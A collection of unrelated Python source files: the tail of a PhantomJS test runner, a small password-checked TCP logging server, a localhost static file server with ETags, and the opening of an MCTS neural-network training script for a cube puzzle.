if not isinstance(message, list):
message = [message]
self.message = [line.rstrip()
for chunk in message
for line in chunk.split("\n")]
self.dtype = detail_type
self.test_id = test_id
def report(self, fp):
col, label = self.dtype.color, self.dtype.label
if self.test_id:
fp.write("{:>5}: {}\n".format(colorize(col, label),
self.test_id))
lo = 0
else:
fp.write("{:>5}: {}\n".format(colorize(col, label),
self.message[0]))
lo = 1
for line in self.message[lo:]:
fp.write(" {}\n".format(colorize("b", line)))
class TestGroup(object):
"""Holds the result of one group of tests (that is, one .js file),
parsed from the output of run_phantomjs (see below).
Subclasses specify what the output means.
A test with zero details is considered to be successful.
"""
def __init__(self, name):
self.name = name
self.n = [0]*T.MAX
self.details = []
def parse(self, rc, out, err):
raise NotImplementedError
def _add_d(self, message, test_id, dtype):
self.n[dtype] += 1
self.details.append(TestDetail(message, test_id, dtype))
def add_pass (self, m, t): self._add_d(m, t, T.PASS)
def add_fail (self, m, t): self._add_d(m, t, T.FAIL)
def add_xpass(self, m, t): self._add_d(m, t, T.XPASS)
def add_xfail(self, m, t): self._add_d(m, t, T.XFAIL)
def add_error(self, m, t): self._add_d(m, t, T.ERROR)
def add_skip (self, m, t): self._add_d(m, t, T.SKIP)
def default_interpret_exit_code(self, rc):
if rc == 0:
if not self.is_successful() and not self.n[T.ERROR]:
self.add_error([],
"PhantomJS exited successfully when test failed")
# Exit code -15 indicates a timeout.
elif rc == 1 or rc == -15:
if self.is_successful():
self.add_error([], "PhantomJS exited unsuccessfully")
elif rc >= 2:
self.add_error([], "PhantomJS exited with code {}".format(rc))
else:
self.add_error([], "PhantomJS killed by signal {}".format(-rc))
def is_successful(self):
return self.n[T.FAIL] + self.n[T.XPASS] + self.n[T.ERROR] == 0
def worst_code(self):
# worst-to-best ordering
for code in (T.ERROR, T.FAIL, T.XPASS, T.SKIP, T.XFAIL, T.PASS):
if self.n[code] > 0:
return code
return T.PASS
def one_char_summary(self, fp):
code = self.worst_code()
fp.write(colorize(code.color, code.short_label))
fp.flush()
def line_summary(self, fp):
code = self.worst_code()
fp.write("{}: {}\n".format(colorize("^", self.name),
colorize(code.color, code.label)))
def report(self, fp, show_all):
self.line_summary(fp)
need_blank_line = False
for detail in self.details:
if show_all or detail.dtype not in (T.PASS, T.XFAIL, T.SKIP):
detail.report(fp)
need_blank_line = True
if need_blank_line:
fp.write("\n")
def report_for_verbose_level(self, fp, verbose):
if verbose == 0:
self.one_char_summary(sys.stdout)
elif verbose == 1:
self.report(sys.stdout, False)
else:
self.report(sys.stdout, True)
class ExpectTestGroup(TestGroup):
"""Test group whose output must be exactly as specified by directives
in the file. This is how you test for an _unsuccessful_ exit code,
or for output appearing on a specific one of stdout/stderr.
"""
def __init__(self, name, rc_exp, stdout_exp, stderr_exp,
rc_xfail, stdout_xfail, stderr_xfail):
TestGroup.__init__(self, name)
if rc_exp is None: rc_exp = 0
self.rc_exp = rc_exp
self.stdout_exp = stdout_exp
self.stderr_exp = stderr_exp
self.rc_xfail = rc_xfail
self.stdout_xfail = stdout_xfail
self.stderr_xfail = stderr_xfail
def parse(self, rc, out, err):
self.parse_output("stdout", self.stdout_exp, out, self.stdout_xfail)
self.parse_output("stderr", self.stderr_exp, err, self.stderr_xfail)
exit_msg = ["expected exit code {} got {}"
.format(self.rc_exp, rc)]
if rc != self.rc_exp:
exit_desc = "did not exit as expected"
if self.rc_xfail:
self.add_xfail(exit_msg, exit_desc)
else:
self.add_fail(exit_msg, exit_desc)
else:
exit_desc = "exited as expected"
if self.rc_xfail:
self.add_xpass(exit_msg, exit_desc)
else:
self.add_pass(exit_msg, exit_desc)
def parse_output(self, what, exp, got, xfail):
diff = []
le = len(exp)
lg = len(got)
for i in range(max(le, lg)):
e = ""
g = ""
if i < le: e = exp[i]
if i < lg: g = got[i]
if e != g:
diff.extend(("{}: line {} not as expected".format(what, i+1),
"-" + repr(e)[1:-1],
"+" + repr(g)[1:-1]))
if diff:
desc = what + " not as expected"
if xfail:
self.add_xfail(diff, desc)
else:
self.add_fail(diff, desc)
else:
desc = what + " as expected"
if xfail:
self.add_xpass(diff, desc)
else:
self.add_pass(diff, desc)
class TAPTestGroup(TestGroup):
"""Test group whose output is interpreted according to a variant of the
Test Anything Protocol (http://testanything.org/tap-specification.html).
Relative to that specification, these are the changes:
* Plan-at-the-end, explanations for directives, and "Bail out!"
are not supported. ("1..0 # SKIP: explanation" *is* supported.)
* "Anything else" lines are an error.
* Repeating a test point number, or using one outside the plan
range, is an error (this is unspecified in TAP proper).
* Diagnostic lines beginning with # are taken as additional
information about the *next* test point. Diagnostic lines
beginning with ## are ignored.
* Directives are case sensitive.
"""
diag_r = re.compile(r"^#(#*)\s*(.*)$")
plan_r = re.compile(r"^1..(\d+)(?:\s*\#\s*SKIP(?::\s*(.*)))?$")
test_r = re.compile(r"^(not ok|ok)\s*"
r"([0-9]+)?\s*"
r"([^#]*)(?:# (TODO|SKIP))?$")
def parse(self, rc, out, err):
self.parse_tap(out, err)
self.default_interpret_exit_code(rc)
def parse_tap(self, out, err):
points_already_used = set()
messages = []
# Look for the plan.
# Diagnostic lines are allowed to appear above the plan, but not
# test lines.
for i in range(len(out)):
line = out[i]
m = self.diag_r.match(line)
if m:
if not m.group(1):
messages.append(m.group(2))
continue
m = self.plan_r.match(line)
if m:
break
messages.insert(0, line)
self.add_error(messages, "Plan line not interpretable")
if i + 1 < len(out):
self.add_skip(out[(i+1):], "All further output ignored")
return
else:
self.add_error(messages, "No plan line detected in output")
return
max_point = int(m.group(1))
if max_point == 0:
if any(msg.startswith("ERROR:") for msg in messages):
self.add_error(messages, m.group(2) or "Test group skipped")
else:
self.add_skip(messages, m.group(2) or "Test group skipped")
if i + 1 < len(out):
self.add_skip(out[(i+1):], "All further output ignored")
return
prev_point = 0
for i in range(i+1, len(out)):
line = out[i]
m = self.diag_r.match(line)
if m:
if not m.group(1):
messages.append(m.group(2))
continue
m = self.test_r.match(line)
if m:
status = m.group(1)
point = m.group(2)
desc = m.group(3)
dirv = m.group(4)
if point:
point = int(point)
else:
point = prev_point + 1
if point in points_already_used:
# A reused test point is an error.
self.add_error(messages, desc + " [test point repeated]")
else:
points_already_used.add(point)
# A point above the plan limit is an automatic *fail*.
# The test suite relies on this in testing exit().
if point > max_point:
status = "not ok"
if status == "ok":
if not dirv:
self.add_pass(messages, desc)
elif dirv == "TODO":
self.add_xpass(messages, desc)
elif dirv == "SKIP":
self.add_skip(messages, desc)
else:
self.add_error(messages, desc +
" [ok, with invalid directive "+dirv+"]")
else:
if not dirv:
self.add_fail(messages, desc)
elif dirv == "TODO":
self.add_xfail(messages, desc)
else:
self.add_error(messages, desc +
" [not ok, with invalid directive "+dirv+"]")
del messages[:]
prev_point = point
else:
self.add_error([line], "neither a test nor a diagnostic")
# Any output on stderr is an error, with one exception: the timeout
# message added by record_process_output, which is treated as an
# unnumbered "not ok".
if err:
if len(err) == 1 and err[0].startswith("TIMEOUT: "):
points_already_used.add(prev_point + 1)
self.add_fail(messages, err[0][len("TIMEOUT: "):])
else:
self.add_error(err, "Unexpected output on stderr")
# Any missing test points are fails.
for pt in range(1, max_point+1):
if pt not in points_already_used:
self.add_fail([], "test {} did not report status".format(pt))
class TestRunner(object):
def __init__(self, base_path, phantomjs_exe, options):
self.base_path = base_path
self.cert_path = os.path.join(base_path, 'certs')
self.harness = os.path.join(base_path, 'testharness.js')
self.phantomjs_exe = phantomjs_exe
self.verbose = options.verbose
self.debugger = options.debugger
self.to_run = options.to_run
self.server_errs = []
def signal_server_error(self, exc_info):
self.server_errs.append(exc_info)
def get_base_command(self, debugger):
if debugger is None:
return [self.phantomjs_exe]
elif debugger == "gdb":
return ["gdb", "--args", self.phantomjs_exe]
elif debugger == "lldb":
return ["lldb", "--", self.phantomjs_exe]
elif debugger == "valgrind":
return ["valgrind", self.phantomjs_exe]
else:
raise RuntimeError("Don't know how to invoke " + self.debugger)
def run_phantomjs(self, script,
script_args=[], pjs_args=[], stdin_data=[],
timeout=TIMEOUT, silent=False):
verbose = self.verbose
debugger = self.debugger
if silent:
verbose = False
debugger = None
output = []
command = self.get_base_command(debugger)
command.extend(pjs_args)
command.append(script)
if verbose:
command.append('--verbose={}'.format(verbose))
command.extend(script_args)
if verbose >= 3:
sys.stdout.write("## running {}\n".format(" ".join(command)))
if debugger:
# FIXME: input-feed mode doesn't work with a debugger,
# because how do you tell the debugger that the *debuggee*
# needs to read from a pipe?
subprocess.call(command)
return 0, [], []
else:
return do_call_subprocess(command, verbose, stdin_data, timeout)
def run_test(self, script, name):
script_args = []
pjs_args = []
use_harness = True
use_snakeoil = True
stdin_data = []
stdout_exp = []
stderr_exp = []
rc_exp = None
stdout_xfail = False
stderr_xfail = False
rc_xfail = False
timeout = TIMEOUT
def require_args(what, i, tokens):
if i+1 == len(tokens):
raise ValueError(what + "directive requires an argument")
if self.verbose >= 3:
sys.stdout.write(colorize("^", name) + ":\n")
# Parse any directives at the top of the script.
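        # For illustration (hypothetical test file), a directive line such as
        #   //! timeout: 10 expect-exit: 1 no-harness
        # sets several options at once, while "phantomjs:", "script:",
        # "stdin:", "expect-stdout:" and "expect-stderr:" consume the rest
        # of their line.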
try:
with open(script, "rt") as s:
for line in s:
if not line.startswith("//!"):
break
tokens = shlex.split(line[3:], comments=True)
skip = False
for i in range(len(tokens)):
if skip:
skip = False
continue
tok = tokens[i]
if tok == "no-harness":
use_harness = False
elif tok == "no-snakeoil":
use_snakeoil = False
elif tok == "expect-exit-fails":
rc_xfail = True
elif tok == "expect-stdout-fails":
stdout_xfail = True
elif tok == "expect-stderr-fails":
stderr_xfail = True
elif tok == "timeout:":
require_args(tok, i, tokens)
timeout = float(tokens[i+1])
if timeout <= 0:
raise ValueError("timeout must be positive")
skip = True
elif tok == "expect-exit:":
require_args(tok, i, tokens)
rc_exp = int(tokens[i+1])
skip = True
elif tok == "phantomjs:":
require_args(tok, i, tokens)
pjs_args.extend(tokens[(i+1):])
break
elif tok == "script:":
require_args(tok, i, tokens)
script_args.extend(tokens[(i+1):])
break
elif tok == "stdin:":
require_args(tok, i, tokens)
stdin_data.append(" ".join(tokens[(i+1):]) + "\n")
break
elif tok == "expect-stdout:":
require_args(tok, i, tokens)
stdout_exp.append(" ".join(tokens[(i+1):]))
break
elif tok == "expect-stderr:":
require_args(tok, i, tokens)
stderr_exp.append(" ".join(tokens[(i+1):]))
break
else:
raise ValueError("unrecognized directive: " + tok)
except Exception as e:
grp = TestGroup(name)
if hasattr(e, 'strerror') and hasattr(e, 'filename'):
grp.add_error([], '{} ({}): {}\n'
.format(name, e.filename, e.strerror))
else:
grp.add_error([], '{} ({}): {}\n'
.format(name, script, str(e)))
return grp
if use_harness:
script_args.insert(0, script)
script = self.harness
if use_snakeoil:
pjs_args.insert(0, '--ssl-certificates-path=' + self.cert_path)
rc, out, err = self.run_phantomjs(script, script_args, pjs_args,
stdin_data, timeout)
if rc_exp or stdout_exp or stderr_exp:
grp = ExpectTestGroup(name,
rc_exp, stdout_exp, stderr_exp,
rc_xfail, stdout_xfail, stderr_xfail)
else:
grp = TAPTestGroup(name)
grp.parse(rc, out, err)
return grp
def run_tests(self):
start = time.time()
base = self.base_path
nlen = len(base) + 1
results = []
for test_glob in TESTS:
test_glob = os.path.join(base, test_glob)
for test_script in sorted(glob.glob(test_glob)):
tname = os.path.splitext(test_script)[0][nlen:]
if self.to_run:
for to_run in self.to_run:
if to_run in tname:
break
else:
continue
any_executed = True
grp = self.run_test(test_script, tname)
grp.report_for_verbose_level(sys.stdout, self.verbose)
results.append(grp)
grp = TestGroup("HTTP server errors")
for ty, val, tb in self.server_errs:
grp.add_error(traceback.format_tb(tb, 5),
traceback.format_exception_only(ty, val)[-1])
grp.report_for_verbose_level(sys.stdout, self.verbose)
results.append(grp)
sys.stdout.write("\n")
return self.report(results, time.time() - start)
def report(self, results, elapsed):
# There is always one test group, for the HTTP server errors.
if len(results) == 1:
sys.stderr.write("No tests selected for execution.\n")
return 1
n = [0] * T.MAX
for grp in results:
if self.verbose == 0 and not grp.is_successful():
grp.report(sys.stdout, False)
for i, x in enumerate(grp.n): n[i] += x
sys.stdout.write("{:6.3f}s elapsed\n".format(elapsed))
for s in (T.PASS, T.FAIL, T.XPASS, T.XFAIL, T.ERROR, T.SKIP):
if n[s]:
sys.stdout.write(" {:>4} {}\n".format(n[s], s.long_label))
if n[T.FAIL] == 0 and n[T.XPASS] == 0 and n[T.ERROR] == 0:
return 0
else:
return 1
def init():
base_path = os.path.normpath(os.path.dirname(os.path.abspath(__file__)))
phantomjs_exe = os.path.normpath(base_path + '/../bin/phantomjs')
if sys.platform in ('win32', 'cygwin'):
phantomjs_exe += '.exe'
if not os.path.isfile(phantomjs_exe):
sys.stdout.write("{} is unavailable, cannot run tests.\n"
.format(phantomjs_exe))
sys.exit(1)
parser = argparse.ArgumentParser(description='Run PhantomJS tests.')
parser.add_argument('-v', '--verbose', action='count', default=0,
help='Increase verbosity of logs (repeat for more)')
parser.add_argument('to_run', nargs='*', metavar='test',
help='tests to run (default: all of them)')
parser.add_argument('--debugger', default=None,
help="Run PhantomJS under DEBUGGER")
parser.add_argument('--color', metavar="WHEN", default='auto',
choices=['always', 'never', 'auto'],
help="colorize the output; can be 'always',"
" 'never', or 'auto' (the default)")
options = parser.parse_args()
activate_colorization(options)
runner = TestRunner(base_path, phantomjs_exe, options)
if options.verbose:
rc, ver, err = runner.run_phantomjs('--version', silent=True)
if rc != 0 or len(ver) != 1 or len(err) != 0:
sys.stdout.write(colorize("R", "FATAL")+": Version check failed\n")
for l in ver:
sys.stdout.write(colorize("b", "## " + l) + "\n")
for l in err:
sys.stdout.write(colorize("b", "## " + l) + "\n")
sys.stdout.write(colorize("b", "## exit {}".format(rc)) + "\n")
sys.exit(1)
sys.stdout.write(colorize("b", "## Testing PhantomJS "+ver[0])+"\n")
# Run all the tests in Chatham Islands Standard Time, UTC+12:45.
# This timezone is deliberately chosen to be unusual: it's not a
# whole number of hours offset from UTC *and* it's more than twelve
# hours offset from UTC.
#
# The Chatham Islands do observe daylight savings, but we don't
# implement that because testsuite issues only reproducible on two
# particular days out of the year are too much tsuris.
#
# Note that the offset in a TZ value is the negative of the way it's
# usually written, e.g. UTC+1 would be xxx-1:00.
os.environ["TZ"] = "CIST-12:45:00"
return runner
def main():
runner = init()
try:
with HTTPTestServer(runner.base_path,
runner.signal_server_error,
runner.verbose):
sys.exit(runner.run_tests())
except Exception:
trace = traceback.format_exc(5).split("\n")
# there will be a blank line at the end of 'trace'
sys.stdout.write(colorize("R", "FATAL") + ": " + trace[-2] + "\n")
for line in trace[:-2]:
sys.stdout.write(colorize("b", "## " + line) + "\n")
sys.exit(1)
except KeyboardInterrupt:
sys.exit(2)
main()
|
sserver.py
|
import socket
import threading
import socketserver
import datetime
import sys
import errno
import time
global_lock = threading.Lock()
filename = "registro_clientes.txt"
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
self.obtiene_y_registra_datos()
def obtiene_y_registra_datos(self):
print("[!] Server invocado")
continua = True
buffer = ''
while continua:
try:
data = str(self.request.recv(1024), 'utf-8')
buffer += data
if '\n' in buffer and len(buffer) > 1:
continua = False
except socket.error as e:
err = e.args[0]
if err == errno.EAGAIN or err == errno.EWOULDBLOCK:
                    time.sleep(1)
continue
else:
sys.exit(1)
try:
lista_registros = buffer.split(",")
data = data.split(",")
data = data[1:]
tmp = ""
for elemento in data:
tmp += " " + elemento
data = tmp
if lista_registros[0] == password:
                with global_lock:
                    with open(filename, "a") as f:
                        fecha_hora = datetime.datetime.now().strftime('%d-%m-%Y %H:%M:%S')
                        print(f"{self.client_address[0]},{fecha_hora},{data}")
                        f.write(f"{self.client_address[0]},{fecha_hora},{data}")
cur_thread = threading.current_thread()
response = bytes("Datos obtenidos", 'utf-8')
self.request.sendall(response)
else:
response = bytes("Nop!", 'utf-8')
self.request.sendall(response)
        except Exception:
response = bytes("Error en procesamiento de datos", 'utf-8')
self.request.sendall(response)
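# Illustrative wire format expected by the handler (assumption drawn from the
# parsing above): a single comma-separated line terminated by '\n', e.g.
#   b"clave,sensor01,23.5\n"
# whose first field must match the server password; the remaining fields are
# appended to registro_clientes.txt together with the client IP and timestamp.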
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
if __name__ == "__main__":
password=""
    if len(sys.argv) < 4:
        print("[!] Please provide an IP, port, and password.")
        print("Example:")
print(f"python {sys.argv[0].split('/')[-1]} 127.0.0.1 443 password\n")
exit(1)
else:
print("\n")
HOST = sys.argv[1]
PORT = int(sys.argv[2])
try:
password = sys.argv[3]
print("[+] Password seteada!")
except:
password = ''
print("[!] Servicio sin password!, muy peligroso y mala idea!")
try:
print(f"[+] Levantando el servidor: {HOST}:{PORT}...", end="")
server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
try:
ip, port = server.server_address
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
print("OK")
print("[+] Server esperando peticiones!")
server_thread.join()
except Exception as err:
print(err)
finally:
server.shutdown()
server.server_close()
except KeyboardInterrupt as ke:
print("Bye!")
except Exception as e:
print(e)
exit(1)
|
httpd.py
|
import hashlib
import os
import threading
try:
from http.server import HTTPServer, SimpleHTTPRequestHandler
except ImportError:
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
class ETagHandler(SimpleHTTPRequestHandler):
def end_headers(self):
file = self.translate_path(self.path)
if not os.path.isdir(file) and os.path.exists(file):
            with open(file, 'rb') as fd:
                etag = hashlib.md5(fd.read()).hexdigest()
self.send_header('ETag', etag)
SimpleHTTPRequestHandler.end_headers(self)
class StaticFileServer():
def __init__(self):
self.httpd = HTTPServer(('localhost', 8000), ETagHandler)
def __enter__(self):
self.server_thread = threading.Thread(target=self.httpd.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
def __exit__(self, *args):
self.httpd.shutdown()
self.httpd.server_close()
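# Illustrative usage sketch (not part of the original module): run this file
# directly to serve the current directory on http://localhost:8000/ with ETags.
if __name__ == "__main__":
    import time
    with StaticFileServer():
        print("Serving on http://localhost:8000/ (Ctrl+C to stop)")
        try:
            while True:
                time.sleep(1)
        except KeyboardInterrupt:
            pass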
|
train_develop_memory_leak.py
|
"""
End to end training of my neural network model.
The training routine has three key phases
- Evaluation through MCTS
- Data generation through MCTS
- Neural network training
"""
import numpy as np
from collections import defaultdict, deque, Counter, namedtuple
import itertools
import warnings
import os, psutil # useful for memory management
from datetime import datetime
from mcts_nn_cube import State, MCTSAgent
import objgraph
import pympler
from pympler import muppy
from pympler import summary
from pympler import tracker
tr = tracker.SummaryTracker()
from pprint import pprint
import gc
# this keeps track of the training runs, including the older versions that we are extending
VERSIONS = ["v0.9.3.memory_leak"]
# memory management
MY_PROCESS = psutil.Process(os.getpid())
def memory_used():
return MY_PROCESS.memory_info().rss
def str_between(s, start, end):
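    # illustrative: str_between("model_v1_gen012.h5", "_gen", ".h5") -> "012"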
return (s.split(start))[1].split(end)[0]
class GameAgent():
def __init__(self, game_id):
self.game_id = game_id
self.self_play_stats=defaultdict(list)
self.game_stats=defaultdict(list)
self.data_states = []
self.data_policies = []
self.data_values = []
self.counter=0
self.done=False
self.win=False
# can attach other attributes as needed
class BatchGameAgent():
"""
    Runs a batch of games concurrently, stepping each game's MCTS agent and
    collecting per-game statistics and training data.
"""
def __init__(self, model, max_steps, max_depth, max_game_length, transposition_table, decay, exploration):
self.game_agents = deque()
self.model = model
self.max_depth = max_depth
self.max_steps = max_steps
self.max_game_length = max_game_length
self.transposition_table = transposition_table
self.exploration = exploration
self.decay = decay
def is_empty(self):
return not bool(self.game_agents)
def append_states(self, state_info_iter):
for game_id, state, distance, distance_level in state_info_iter:
mcts = MCTSAgent(self.model.function,
state.copy(),
max_depth = self.max_depth,
transposition_table = self.transposition_table.copy(),
c_puct = self.exploration,
gamma = self.decay)
game_agent = GameAgent(game_id)
game_agent.mcts = mcts
game_agent.distance = distance
game_agent.distance_level = distance_level
self.game_agents.append(game_agent)
def run_game_agent_one_step(self, game_agent):
mcts = game_agent.mcts
mcts.search(steps=self.max_steps)
# reduce the max batch size to prevent the worker from blocking
self.model.set_max_batch_size(self.model.get_max_batch_size() - 1)
def process_completed_step(self, game_agent):
mcts = game_agent.mcts
# find next state
probs = mcts.action_probabilities(inv_temp = 10)
action = np.argmax(probs)
#action = np.random.choice(12, p=probs)
shortest_path = game_agent.mcts.stats('shortest_path')
# record stats
game_agent.self_play_stats['_game_id'].append(game_agent.game_id)
game_agent.self_play_stats['_step_id'].append(game_agent.counter)
game_agent.self_play_stats['shortest_path'].append(shortest_path)
game_agent.self_play_stats['action'].append(action)
game_agent.self_play_stats['value'].append(mcts.stats('value'))
game_agent.self_play_stats['prior'].append(mcts.stats('prior'))
game_agent.self_play_stats['prior_dirichlet'].append(mcts.stats('prior_dirichlet'))
game_agent.self_play_stats['visit_counts'].append(mcts.stats('visit_counts'))
game_agent.self_play_stats['total_action_values'].append(mcts.stats('total_action_values'))
# training data (also recorded in stats)
game_agent.data_states.append(mcts.initial_node.state.input_array_no_history())
policy = mcts.action_probabilities(inv_temp = 10)
game_agent.data_policies.append(policy)
game_agent.self_play_stats['updated_policy'].append(policy)
game_agent.data_values.append(0) # updated if game is success
game_agent.self_play_stats['updated_value'].append(0)
# prepare for next state
game_agent.counter += 1
#if shortest_path < 0:
# print("(DB) no path")
if (game_agent.counter > 1 and shortest_path < 0) or game_agent.counter >= self.max_game_length:
game_agent.win = False
game_agent.done = True
else:
mcts.advance_to_action(action)
if mcts.is_terminal():
game_agent.win = True
game_agent.done = True
def run_one_step_with_threading(self):
import threading
# start threads
self.model.set_max_batch_size(len(self.game_agents))
threads = []
for game_agent in self.game_agents:
t = threading.Thread(target=self.run_game_agent_one_step, args=(game_agent, ))
t.start()
threads.append(t)
# wait for threads to finish
for t in threads:
t.join()
for game_agent in self.game_agents:
self.process_completed_step(game_agent)
def run_one_step(self):
for game_agent in self.game_agents:
mcts = game_agent.mcts
mcts.search(steps=self.max_steps)
self.process_completed_step(game_agent)
def finished_game_results(self):
for _ in range(len(self.game_agents)):
game_agent = self.game_agents.popleft()
if not game_agent.done:
self.game_agents.append(game_agent)
else:
if game_agent.win:
value = 1
for i in range(game_agent.counter):
value *= self.decay
game_agent.data_values[-(i+1)] = value
game_agent.self_play_stats['updated_value'][-(i+1)] = value
# record game stats
game_agent.game_stats['_game_id'].append(game_agent.game_id)
game_agent.game_stats['distance_level'].append(game_agent.distance_level)
game_agent.game_stats['training_distance'].append(game_agent.distance)
game_agent.game_stats['max_game_length'].append(self.max_game_length)
game_agent.game_stats['win'].append(game_agent.win)
game_agent.game_stats['total_steps'].append(game_agent.counter if game_agent.win else -1)
yield game_agent
class TrainingAgent():
"""
This agent handles all the details of the training.
"""
def __init__(self):
import models
# Threading
self.multithreaded = True
# Model (NN) parameters (fixed)
self.prev_state_history = 8 # the number of previous states (including the current one) used as input to the model
self.checkpoint_model = models.ConvModel2D3D(history=self.prev_state_history) # this doesn't build and/or load the model yet
self.best_model = models.ConvModel2D3D(history=self.prev_state_history) # this doesn't build and/or load the model yet
if self.multithreaded:
self.checkpoint_model.multithreaded = True
self.best_model.multithreaded = True
self.learning_rate = .001
# MCTS parameters (fixed)
self.max_depth = 900
self.max_steps = 1600
self.use_prebuilt_transposition_table = False
self.decay = 0.95 # gamma
self.exploration = 1. #c_puct
self.prebuilt_transposition_table = None # built later
# Validation flags
self.validate_training_data = True
# Training parameters (fixed)
self.batch_size = 32
self.games_per_generation = 4#512
self.starting_distance = 1
self.min_distance = 1
self.win_rate_target = .5
self.max_game_length = 100
self.prev_generations_used_for_training = 8
self.training_sample_ratio = 1/self.prev_generations_used_for_training
self.games_per_evaluation = 2#128
# Training parameters preserved between generations
self.training_distance_level = float(self.starting_distance)
self.recent_wins = Counter()
self.recent_games = Counter()
self.checkpoint_training_distance_level = float(self.starting_distance)
self.checkpoint_recent_wins = Counter()
self.checkpoint_recent_games = Counter()
# Training parameters (dynamic)
self.game_number = 0
self.self_play_start = None # date and time (utc)
self.self_play_end = None
self.training_start = None
self.training_end = None
# Evaluation parameters (dynamic)
self.generation = 0
self.best_generation = 0
# Self play stats
# These are functionally data tables implemented as a dictionary of lists
# The keys are the column names. This makes it easy to change the stats I am recording.
self.self_play_stats = defaultdict(list)
self.game_stats = defaultdict(list)
self.training_stats = defaultdict(list)
self.generation_stats = defaultdict(list)
# Training data
self.training_data_states = []
self.training_data_policies = []
self.training_data_values = []
def build_models(self):
"""
Builds both checkpoint and best model
May be overwritten later by loaded weights
"""
self.checkpoint_model.build()
self.best_model.build()
def load_transposition_table(self):
#TODO: Add this. For now, just use empty table.
warnings.warn("load_transposition_table is not properly implemented", stacklevel=2)
self.prebuilt_transposition_table = {}
def load_models(self):
"""
Finds the checkpoint model and the best model in the given naming scheme
and loads those
"""
import os
# load checkpoint model
for version in VERSIONS:
model_files = [f for f in os.listdir('./save/')
if f.startswith("checkpoint_model_{}_gen".format(version))
and f.endswith(".h5")]
if model_files:
# choose newest generation
model_file = max(model_files,
key=lambda f: str_between(f, "_gen", ".h5"))
path = "./save/" + model_file
print("checkpoint model found:", "'" + path + "'")
print("loading model ...")
self.checkpoint_model.load_from_file(path)
self.generation = int(str_between(path, "_gen", ".h5"))
break
else:
print("no checkpoint model found with version {}".format(version))
print("generation set to", self.generation)
# load best model
for version in VERSIONS:
model_files = [f for f in os.listdir('./save/')
if f.startswith("model_{}_gen".format(version))
and f.endswith(".h5")]
if model_files:
# choose newest generation
model_file = max(model_files,
key=lambda f: (str_between(f, "_gen", ".h5")))
path = "./save/" + model_file
print("best model found:", "'" + path + "'")
print("loading model ...")
self.best_model.load_from_file(path)
self.best_generation = int(str_between(path, "_gen", ".h5"))
break
else:
print("no best model found with version {}".format(version))
print("best generation:", self.best_generation)
def save_checkpoint_model(self):
file_name = "checkpoint_model_{}_gen{:03}.h5".format(VERSIONS[0], self.generation)
path = "./save/" + file_name
self.checkpoint_model.save_to_file(path)
print("saved model checkpoint:", "'" + path + "'")
self.checkpoint_training_distance_level = self.training_distance_level
self.checkpoint_recent_wins = Counter()
self.checkpoint_recent_games = Counter()
# add a few free wins to speed up the convergence
for dist in range(int(self.training_distance_level) + 1):
self.checkpoint_recent_games[dist] += 1
self.checkpoint_recent_wins[dist] += 1
def save_and_set_best_model(self):
file_name = "model_{}_gen{:03}.h5".format(VERSIONS[0], self.generation)
path = "./save/" + file_name
self.checkpoint_model.save_to_file(path)
print("saved model:", "'" + path + "'")
self.best_model.load_from_file(path)
self.best_generation = self.generation
self.training_distance_level = self.checkpoint_training_distance_level
self.recent_wins = self.checkpoint_recent_wins
self.recent_games = self.checkpoint_recent_games
def train_model(self):
import os
import h5py
inputs_list = []
outputs_policy_list = []
outputs_value_list = []
counter = 0
for version in VERSIONS:
if counter > self.prev_generations_used_for_training:
break
data_files = [(str_between(f, "_gen", ".h5"), f)
for f in os.listdir('./save/')
if f.startswith("data_{}_gen".format(version))
and f.endswith(".h5")]
# go through in reverse order
for gen, f in reversed(sorted(data_files)):
if counter > self.prev_generations_used_for_training:
break
path = "./save/" + f
print("loading data:", "'" + path + "'")
with h5py.File(path, 'r') as hf:
inputs_list.append(hf['inputs'][:])
outputs_policy_list.append(hf['outputs_policy'][:])
outputs_value_list.append(hf['outputs_value'][:])
counter += 1
inputs_all = np.concatenate(inputs_list, axis=0)
outputs_policy_all = np.concatenate(outputs_policy_list, axis=0)
outputs_value_all = np.concatenate(outputs_value_list, axis=0)
if self.validate_training_data:
print("validating data...")
self.checkpoint_model.validate_data(inputs_all, outputs_policy_all, outputs_value_all, gamma=self.decay)
self.validate_training_data = False # just validate for first round
print("data valid.")
print("processing...")
inputs_all, outputs_policy_all, outputs_value_all = \
self.checkpoint_model.process_training_data(inputs_all, outputs_policy_all, outputs_value_all, augment=True)
n = len(inputs_all)
        sample_size = int((n * self.training_sample_ratio) // 32 + 1) * 32 # roughly a training_sample_ratio fraction of the samples, rounded up to a multiple of 32
sample_idx = np.random.choice(n, size=sample_size)
inputs = inputs_all[sample_idx]
outputs_policy = outputs_policy_all[sample_idx]
outputs_value = outputs_value_all[sample_idx]
print("training...")
self.checkpoint_model.train_on_data([inputs, outputs_policy, outputs_value])
def reset_self_play(self):
# Training parameters (dynamic)
self.game_number = 0
self.self_play_start = None # date and time (utc)
self.self_play_end = None
self.training_start = None
self.training_end = None
# Self play stats
self.self_play_stats = defaultdict(list)
self.game_stats = defaultdict(list)
self.generation_stats = defaultdict(list)
# Training data (one item per game based on randomly chosen game state)
self.training_data_states = []
self.training_data_policies = []
self.training_data_values = []
# set start time
self.self_play_start = datetime.utcnow() # date and time (utc)
def save_training_stats(self):
import pandas as pd
file_name = "stats_{}_gen{:03}.h5".format(VERSIONS[0], self.generation)
path = "./save/" + file_name
# record time of end of self-play
self.self_play_end = datetime.utcnow()
# save generation_stats data
self.generation_stats['_generation'].append(self.generation)
self.generation_stats['best_model_generation'].append(self.best_generation)
self.generation_stats['distance_level'].append(self.training_distance_level)
self.generation_stats['memory_usage'].append(memory_used())
self.generation_stats['version_history'].append(",".join(VERSIONS))
self.generation_stats['self_play_start_datetime_utc'].append(str(self.self_play_start))
self.generation_stats['self_play_end_datetime_utc'].append(str(self.self_play_end))
self.generation_stats['self_play_time_sec'].append((self.self_play_end - self.self_play_start).total_seconds())
generation_stats_df = pd.DataFrame(data=self.generation_stats)
generation_stats_df.to_hdf(path, 'generation_stats', mode='a', format='fixed') #use mode='a' to avoid overwriting
# save game_stats data
game_stats_df = pd.DataFrame(data=self.game_stats)
game_stats_df.to_hdf(path, 'game_stats', mode='a', format='fixed')
# save self_play_stats data
